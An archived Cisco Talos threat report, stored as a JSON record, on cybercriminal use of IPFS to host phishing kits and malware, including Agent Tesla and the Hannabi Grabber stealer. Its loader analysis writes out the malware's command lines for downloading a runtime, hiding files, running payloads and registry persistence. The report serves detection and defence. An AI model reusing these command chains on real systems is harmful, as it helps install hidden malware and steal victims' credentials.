{
	"id": "2e4ae9b8-819a-4bf9-841f-915bac1b5bed",
	"created_at": "2026-04-06T00:14:47.392879Z",
	"updated_at": "2026-04-10T03:21:58.537473Z",
	"deleted_at": null,
	"sha1_hash": "ad2ec9b16e9fd5ac699a09ee59df60ee4293c7b8",
	"title": "Threat Spotlight: Cyber Criminal Adoption of IPFS for Phishing, Malware Campaigns",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1938698,
	"plain_text": "Threat Spotlight: Cyber Criminal Adoption of IPFS for Phishing,\r\nMalware Campaigns\r\nBy Edmund Brumaghin\r\nPublished: 2022-11-09 · Archived: 2026-04-05 19:34:20 UTC\r\nThe InterPlanetary File System (IPFS) is an emerging Web3 technology that is currently seeing widespread\r\nabuse by threat actors.\r\nCisco Talos has observed multiple ongoing campaigns that leverage the IPFS network to host their\r\nmalware payloads and phishing kit infrastructure while facilitating other attacks.\r\nIPFS is often used for legitimate purposes, which makes it more difficult for security teams to differentiate\r\nbetween benign and malicious IPFS activity in their networks.\r\nMultiple malware families are currently being hosted within IPFS and retrieved during the initial stages of\r\nmalware attacks.\r\nOrganizations should become familiar with these new technologies and how they are being leveraged by\r\nthreat actors to defend against new techniques that use them.\r\nThe emergence of new Web3 technologies in recent years has resulted in drastic changes to the way content is\r\nhosted and accessed on the internet. Many of these technologies are focused on circumventing censorship and\r\ndecentralizing control of large portions of the content and infrastructure people use and access on a regular basis.\r\nWhile these technologies have legitimate uses in a variety of practical applications, they also create opportunities\r\nfor adversaries to take advantage of them within their phishing and malware distribution campaigns. 
Over the past\r\nfew years, Talos has observed an increase in the number of cybercriminals taking advantage of technologies like\r\nthe InterPlanetary File System (IPFS) to facilitate the hosting of malicious content as they provide the equivalent\r\nof “bulletproof hosting” and are extremely resilient to attempts to moderate the content stored there.\r\nWhat is the InterPlanetary File System (IPFS)?\r\nThe InterPlanetary File System (IPFS) is a Web3 technology designed to enable decentralized storage of resources\r\non the internet. When content is stored on the IPFS network, it is mirrored across many systems that participate in\r\nthe network, so that when one of these systems is unavailable, other systems can service requests for this content.\r\nIPFS stores different types of data, such as the images associated with NFTs, resources used to render web pages,\r\nor files that can be accessed by internet users. IPFS was designed to be resilient against content censorship,\r\nmeaning that it is not possible to effectively remove content from within the IPFS network once it’s stored there.\r\nIPFS gateways\r\nUsers that wish to access content stored within IPFS can do so either using an IPFS client, such as the one\r\nprovided here, or they can make use of “IPFS Gateways” which effectively sit between the internet and the IPFS\r\nhttps://blog.talosintelligence.com/ipfs-abuse/\r\nPage 1 of 15\n\nnetwork to allow clients to access content hosted on the network. This functionality is similar to what Tor2web\r\ngateways provide to access contents within the Tor network without requiring a client installation.\r\nAnyone can set up an IPFS gateway using a range of publicly available tools. 
This screenshot shows several of the\r\npublic IPFS gateways accessible across the internet.\r\nIt is simple to store new content within IPFS and once there, the content is resilient against takedowns, making it\r\nincreasingly attractive to a variety of attackers for hosting phishing pages, malware payloads and other malicious\r\ncontent.\r\nWhen systems use IPFS gateways to access contents stored on the IPFS network, they typically rely on the same\r\nHTTP/HTTPS-based communications used to access other websites on the internet. IPFS gateways can be\r\nconfigured to handle incoming requests in a few different ways. In some implementations, the subdomain\r\nspecified in the HTTP request is used to locate the requested resource on the IPFS network as shown in the\r\nfollowing example, which is a mirrored copy of Wikipedia hosted on the IPFS network. The IPFS identifier, or\r\nCID, for the resource is highlighted below.\r\nhxxps[:]//bafybeiaysi4s6lnjev27ln5icwm6tueaw2vdykrtjkwiphwekaywqhcjze[.]ipfs[.]infura-ipfs[.]io\r\nIn other implementations, the IPFS resource location is appended to the end of the URL being requested, as shown\r\nin the following example:\r\nhxxps[:]//ipfs[.]io/ipfs/bafybeiaysi4s6lnjev27ln5icwm6tueaw2vdykrtjkwiphwekaywqhcjze\r\nThere are other methods for handling requests using DNS entries, as well. The specific implementation varies\r\nacross IPFS gateways. Browsers have even begun implementing native support for the IPFS network, removing\r\nthe need to use IPFS gateways in some cases.\r\nIPFS use in phishing campaigns\r\nIPFS is currently being leveraged to host phishing kits, which are the websites that phishing campaigns typically\r\nuse to collect and harvest credentials from unsuspecting victims. In one example, the victim received a PDF that\r\npurports to be associated with the DocuSign document-signing service. 
A screenshot of one such PDF is shown\r\nbelow.\r\nWhen the victim clicks on the “Review Document” link, they are redirected to a page made to appear as if it is a\r\nMicrosoft authentication page. However, the page is actually being hosted on the IPFS network.\r\nThe user is prompted to enter an email address and password. This information is then transmitted to the attacker\r\nvia an HTTP POST request to an attacker-controlled web server where it can be collected and processed for use in\r\nfurther attacks.\r\nWe’ve observed several similar examples in phishing campaigns over the past year, as adversaries recognize the\r\ncontent moderation challenges associated with hosting their phishing kits on the IPFS network. In this case, the\r\nPDF hyperlink was pointing to an IPFS gateway that moderated the content to protect potential victims and\r\ndisplayed the following message to victims attempting to navigate to it.\r\nHowever, the content is still present within the IPFS network and simply changing the IPFS gateway being used to\r\nretrieve the content confirms this is the case.\r\nIPFS use in malware campaigns\r\nThere are a variety of threat actors currently leveraging technologies like IPFS in their malware distribution\r\ncampaigns. It provides low-cost storage for malicious payloads while offering resilience against content\r\nmoderation, effectively acting as “bulletproof hosting” for adversaries. Likewise, the use of common IPFS\r\ngateways for accessing the malicious contents hosted within the IPFS network makes it more difficult for\r\norganizations to block access when compared to the use of malicious domains for content retrieval. 
We have\r\nobserved various samples in the wild that are currently leveraging IPFS.\r\nThroughout 2022, we’ve observed the volume of samples in the wild continuing to increase as this becomes a\r\nmore popular hosting method for adversaries. Below is a graphic showing the increase in the number of unique\r\nsamples relying on IPFS that have been uploaded to public sample repositories.\r\nAgent Tesla malspam campaign\r\nWe’ve observed ongoing malspam campaigns leveraging IPFS throughout the infection process to eventually\r\nretrieve a malware payload. In one example, the email sent to victims purports to be from a Turkish financial\r\ninstitution and claims to be associated with SWIFT payments, a commonly used system for international monetary\r\ntransactions.\r\nThe email contains a ZIP attachment that holds a PE32 executable. The executable, written in .NET, functions as a\r\ndownloader for the next stage of the infection chain. When executed, the downloader reaches out to an IPFS\r\ngateway to retrieve a blob of data that has been hosted within the IPFS network as shown below.\r\nThis data contains an obfuscated PE32 executable that functions as the next-stage malware payload. The\r\ndownloader takes the data from the IPFS gateway and stores each byte in an array. It then uses a key value stored\r\nin the executable to convert the byte array into the next-stage PE32.\r\nThis is then reflectively loaded and executed, launching the next stage of the infection process, which in this case\r\nis a remote access trojan (RAT) called Agent Tesla.\r\nIn another example, we observed a variety of malware payloads being uploaded to public sample repositories over\r\na period of several months. We identified three distinct clusters of malware that were likely being created by the\r\nsame threat actor. 
Code-level issues suggest that many of the samples were undergoing active\r\ndevelopment while being uploaded, possibly to test detection capabilities.\r\nIn all three clusters, the initial payload functioned as a loader and operated similarly; however, the final payload\r\nhosted on the IPFS network was different in each cluster. The final payloads we observed included a Python-based\r\ninformation stealer, reverse shell payloads that were likely generated using msfvenom, and a batch file designed to\r\ndestroy victim systems.\r\nInitial loader\r\nThe loader used in all of these cases functioned similarly, sometimes hosted on the Discord content delivery\r\nnetwork (CDN), a practice that has become increasingly common with malware distributors as previously\r\ndescribed here. The file names used indicate that they may have been spread under the guise of cheats and cracks\r\nfor video games such as “Minecraft.” In most cases, the loader was not packed, but we did observe samples\r\npacked using UPX.\r\nWhen executed, the loader first creates a directory structure within %APPDATA% using the following command:\r\nC:\\Windows\\system32\\cmd.exe /c cd %appdata%\\Microsoft \u0026\u0026 mkdir Network\r\nThe malware then attempts to retrieve Python 3.10 from the legitimate software provider using the cURL\r\ncommand.\r\nThis is notable, as the choice to directly leverage cURL may significantly reduce the number of potential victims,\r\nas it was not added to Windows as a native command line utility until Windows 11. 
The command line syntax\r\nused to initiate the download is shown below.\r\nC:\\Windows\\system32\\cmd.exe /c curl https://www.python.org/ftp/python/3.10.4/python-3.10.4-embed-amd64.zip -o %appdata%\\Microsoft\\Network\\python-3.10.4-embed-amd64.zip\r\nOnce the ZIP archive has been retrieved, it is then unzipped into the directory that was previously created using\r\nthe PowerShell “Expand-Archive” cmdlet.\r\nC:\\Windows\\system32\\cmd.exe /c cd %appdata%\\Microsoft\\Network \u0026\u0026 powershell Expand-Archive python-3.10.4-embed-amd64.zip -DestinationPath %appdata%\\Microsoft\\Network\r\nThe malware then attempts to retrieve the final payload in the infection chain, storing it within the Network\r\ndirectory using the filename “Packages.txt.” An example of the loader retrieving Hannabi Grabber, an information\r\nstealer written in Python, is shown below.\r\nThe loader then uses the attrib.exe utility to set the System and Hidden flags on the previously created directory as\r\nwell as the Python ZIP archive and final payload that was retrieved.\r\nC:\\Windows\\system32\\cmd.exe /c attrib +S +H %appdata%\\Microsoft\\Network\r\nC:\\Windows\\system32\\cmd.exe /c attrib +S +H %appdata%\\Microsoft\\Network\\python-3.10.4-embed-amd64.zip\r\nC:\\Windows\\system32\\cmd.exe /c attrib +S +H %appdata%\\Microsoft\\Network\\Packages.txt\r\nFinally, the loader invokes the newly downloaded Python executable and passes the final payload as a command\r\nline argument, executing the next stage of the infection process.\r\nC:\\Windows\\system32\\cmd.exe /c cd %appdata%\\Microsoft\\Network \u0026\u0026 python.exe Packages.txt\r\nIn some cases, the malware was also observed achieving persistence via adding entries into the Windows registry\r\nat the following locations:\r\nHKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\r\nHKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\nDuring our analysis of 
samples associated with this loader, we observed that the IPFS gateway that was being used\r\nwas no longer servicing requests; however, Talos obtained the next-stage payloads manually via another IPFS\r\ngateway for analysis.\r\nReverse shell\r\nIn one of the clusters leveraging this loader, we observed that the payload being hosted within the IPFS network\r\nwas a Python script containing a large base64 encoded blob along with the Python code responsible for decoding\r\nthe base64. Note that the following screenshot was redacted for space, as the base64-encoded blob was rather\r\nlarge.\r\nThe base64 contained several layers of base64 encoded blobs, each wrapped in Python code responsible for\r\ndecoding them. After decoding all of the layers, the following is the deobfuscated reverse shell payload.\r\nAt the time of analysis, the C2 server was no longer servicing requests on TCP/4444.\r\nDestructive Malware\r\nIn another cluster we analyzed, we observed that the final payload hosted within IPFS was a Windows batch file,\r\nas shown below:\r\nWhen the batch file is retrieved, it is stored within the Network directory using the filename “Script.bat.”\r\nThis batch file is responsible for the following destructive behavior:\r\nDeleting volume shadow copies on the system.\r\nDeleting directory contents stored within C:\\Users (typically associated with user profiles).\r\nIterating through all mounted filesystems present on the system and deleting contents stored on them.\r\nFortunately for victims, in the samples analyzed the loader incorrectly attempts to invoke the batch file as shown\r\nbelow.\r\nC:\\Windows\\system32\\cmd.exe /c cd %appdata%\\Microsoft\\Network \u0026\u0026 powershell -Command start script.bat -Verb RunAs\r\nHannabi Grabber\r\nThe final cluster of malware associated with this loader is responsible for retrieving and executing a Python-based\r\ninformation stealer called 
Hannabi Grabber. In the samples we analyzed, the Python version retrieved does not\r\nnatively contain the modules required for the script to successfully execute, causing the infection process to fail;\r\nhowever, given the volume of features present in the stealer, we analyzed it to confirm detection capabilities in the\r\ncase that it is distributed via different mechanisms.\r\nHannabi Grabber is a full-featured information stealer written in Python. It leverages Discord Webhooks for C2\r\nand data exfiltration. It currently features support for stealing information from a variety of applications that may\r\nbe present on victim systems. It collects survey information from the infected machine, obtains the geographic\r\nlocation of the system via the IPInfo service, takes screenshots and eventually transmits that data to an attacker-controlled Discord server in JSON format.\r\nBelow is a listing of many of the various applications the stealer supports.\r\nIn addition to the previously listed applications, the malware also supports retrieving password and cookie data\r\nfrom Chrome, as shown below.\r\nSimilar functionality also exists to target Mozilla Firefox browser data that may be present on the system.\r\nThe information stealer is particularly interested in Discord and Roblox data. It features several mechanisms that\r\ncheck for the existence of Discord Token Protectors such as DiscordTokenProtector, BetterDiscord and more. If\r\ndiscovered, the malware will attempt to bypass them to obtain Discord tokens from the victim. An example of one\r\nof these checks is shown below.\r\nApplication data that is collected is stored within a directory structure inside of the %TEMP% directory, in a\r\nfolder called “RedDiscord” that is created by the malware. 
Before exfiltrating the data, the malware creates a ZIP\r\narchive within the RedDiscord directory called “Hannabi-\u003cUSERNAME\u003e.zip.” The malware first transmits\r\nbeacon information and will then attempt to exfiltrate the newly created ZIP archive.\r\nHannabi Grabber has a significant amount of functionality that is common to information-stealing malware.\r\nTypically, attackers will attempt to leverage PyInstaller or Py2EXE to compile their Python into a PE32 file\r\nformat prior to distributing it to victims. This is a case where instead, the attacker chose to include a Python\r\ninstallation process during the infection and is leveraging Python directly to steal sensitive information from\r\nvictims.\r\nConclusion\r\nMany new Web3 technologies have emerged recently, attempting to provide valuable functionality to users. As\r\nthese technologies have continued to see increased adoption for legitimate purposes, they have begun to be\r\nleveraged by adversaries as well. 
We have continued to observe an increase in the volume of malware and\r\nphishing campaigns that are taking advantage of technologies like IPFS for the purposes of hosting malicious\r\ncomponents used in malware infections, phishing kits used to collect sensitive authentication data and more.\r\nWe expect this activity to continue to increase as more threat actors recognize that IPFS can be used to facilitate\r\nbulletproof hosting, is resilient against content moderation and law enforcement activities, and introduces\r\nproblems for organizations attempting to detect and defend against attacks that may leverage the IPFS network.\r\nOrganizations should be aware of how these newly emerging technologies are being actively used across the threat\r\nlandscape and evaluate how to best implement security controls to prevent or detect successful attacks in their\r\nenvironments.\r\nCoverage\r\nWays our customers can detect and block this threat are listed below.\r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware\r\ndetailed in this post. Try Secure Endpoint for free here.\r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in\r\nthese attacks.\r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of\r\ntheir campaign. 
You can try Secure Email for free here.\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat\r\nDefense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this\r\nthreat.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco\r\nSecure products.\r\nUmbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and\r\nURLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.\r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites\r\nand tests suspicious sites before users access them.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall\r\nManagement Center.\r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org.\r\nThe following Snort SIDs are applicable to this threat: 60728.\r\nThe following ClamAV signatures are applicable to this threat:\r\nWin.Trojan.AgentTesla-9974905-1\r\nPdf.Phishing.Agent-9974919-0\r\nTxt.Malware.ArtifactDeletion-9974896-0\r\nWin.Trojan.AgentTesla-9974906-0\r\nWin.Downloader.ReverseShell-9974652-1\r\nWin.Loader.Hannabi-9974435-0\r\nWin.Trojan.Hannabi_Grabber-9974436-0\r\nPy.Malware.ReverseShell-9974437-0\r\nOrbital Queries\r\nCisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints\r\nare infected with this specific threat. 
For specific OSqueries on this threat, click here.\r\nIndicators of Compromise\r\nIndicators of Compromise associated with this threat can be found here.\r\nSource: https://blog.talosintelligence.com/ipfs-abuse/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE"
	],
	"references": [
		"https://blog.talosintelligence.com/ipfs-abuse/"
	],
	"report_names": [
		"ipfs-abuse"
	],
	"threat_actors": [],
	"ts_created_at": 1775434487,
	"ts_updated_at": 1775791318,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ad2ec9b16e9fd5ac699a09ee59df60ee4293c7b8.pdf",
		"text": "https://archive.orkl.eu/ad2ec9b16e9fd5ac699a09ee59df60ee4293c7b8.txt",
		"img": "https://archive.orkl.eu/ad2ec9b16e9fd5ac699a09ee59df60ee4293c7b8.jpg"
	}
}